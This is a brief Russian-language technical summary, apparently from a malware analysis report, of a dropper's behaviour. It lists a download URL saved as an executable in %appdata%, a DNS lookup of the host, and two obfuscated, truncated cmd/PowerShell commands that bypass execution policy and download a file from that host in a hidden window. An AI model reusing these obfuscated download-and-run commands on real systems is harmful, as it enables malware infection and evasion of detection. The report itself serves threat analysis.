Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^E^R^sH^e^L^l^.exE ^-^ex^eC^Ut^i^on^p^oL^ICy^ bY^pAs^s -^NOprO^F^Ile^ -WiNDoWS^tYLe ^H^I^Dde^n (N^e^w-^O^BjECt^ sY^s^teM^.Net.WEbCLiE^n^T).^dOWnl^oa^Dfile^(^'http://sutrapone...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "pow^E^R^sH^e^L^l^.exE ^-^ex^eC^Ut^i^on^p^oL^ICy^ bY^pAs^s -^NOprO^F^Ile^ -WiNDoWS^tYLe ^H^I^Dde^n (N^e^w-^O^BjECt^ sY^s^teM^.Net.WEbCLiE^n^T).^dOWnl^oa^Dfile^(^'http://sutrapone...' (со скрытым окном)